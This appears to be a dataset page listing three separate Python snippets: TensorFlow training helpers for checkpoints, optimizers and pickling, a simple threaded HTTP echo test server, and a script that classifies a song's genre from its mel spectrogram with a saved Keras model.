# print 'Succesfully loaded model from {0} at train_iter = {1}'.format(ckpt_path, init_train_iter)
else:
# print 'No checkpoint found'
init_train_iter = -1
return init_train_iter
def set_up_dir(directory, clean=False):
if os.path.exists(directory):
if clean:
shutil.rmtree(directory)
else:
os.makedirs(directory)
def get_optimizer(hparams, lr):
if hparams.opt_type == 'sgd':
return tf.train.GradientDescentOptimizer(lr)
if hparams.opt_type == 'momentum':
return tf.train.MomentumOptimizer(lr, hparams.opt_param1)
elif hparams.opt_type == 'rmsprop':
return tf.train.RMSPropOptimizer(lr, decay=hparams.opt_param1)
elif hparams.opt_type == 'adam':
return tf.train.AdamOptimizer(lr, beta1=hparams.opt_param1, beta2=hparams.opt_param2)
elif hparams.opt_type == 'adagrad':
return tf.train.AdagradOptimizer(lr)
else:
raise Exception('Optimizer {} not supported'.format(hparams.opt_type))
def load_if_pickled(pkl_filepath):
"""Load if the pickle file exists. Else return empty dict"""
if os.path.isfile(pkl_filepath):
with open(pkl_filepath, 'rb') as pkl_file:
data = pickle.load(pkl_file)
else:
data = {}
return data
def save_to_pickle(data, pkl_filepath):
with open(pkl_filepath, 'wb') as pkl_file:
pickle.dump(data, pkl_file)
|
#!env python3
# -*- coding: utf-8 -*-
import threading
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
class TestServer(BaseHTTPRequestHandler):
def handle_headers(self):
for k, v in self.headers.items():
print(k , ":" ,v)
self.rfile.close()
self.send_response(200)
self.end_headers()
def do_GET(self):
self.handle_headers()
self.wfile.write(bytes(self.path, "utf-8"))
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
self.handle_headers()
self.wfile.write(post_data)
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
httpd = ThreadedHTTPServer(("0.0.0.0", 8000), TestServer)
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
|
import numpy as np
import librosa
from tensorflow.keras.models import load_model
import warnings
warnings.filterwarnings('ignore')
test_music = './project/mini/data/country.6.mp3'
y, sr = librosa.load(test_music)
mel_spect = librosa.feature.melspectrogram(y=y, sr=sr, n_fft=2048, hop_length=1024)
mel_spect = librosa.power_to_db(mel_spect, ref=np.max)
if mel_spect.shape[1] != 660:
mel_spect.resize(128,660, refcheck=False)
test_data = mel_spect.reshape(1, 128, 660, 1) / -80
print(test_data.shape)
model = load_model('./project/mini/data/genre_model_resnet50_0.6521.hdf5')
print(model.predict(test_data))
label_number = np.argmax(model.predict(test_data), axis=1)
print(label_number[0])
label_dict = {
0:'hiphop',
1:'rock',
2:'pop',
3:'folk',
4:'electronic',
5:'jazz',
6:'blues',
7:'classical',
8:'reggae',
9:'disco',
10:'country',
11:'ballad',
12:'dance'
}
print(label_dict.get(label_number[0]))
print(test_music.split('/')[-1], '의 장르는', label_dict.get(label_number[0]), '입니다!!')
print(np.round(model.predict(test_data)[0][label_number][0] * 100, 2) , "% 으로 예상됩니다.")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.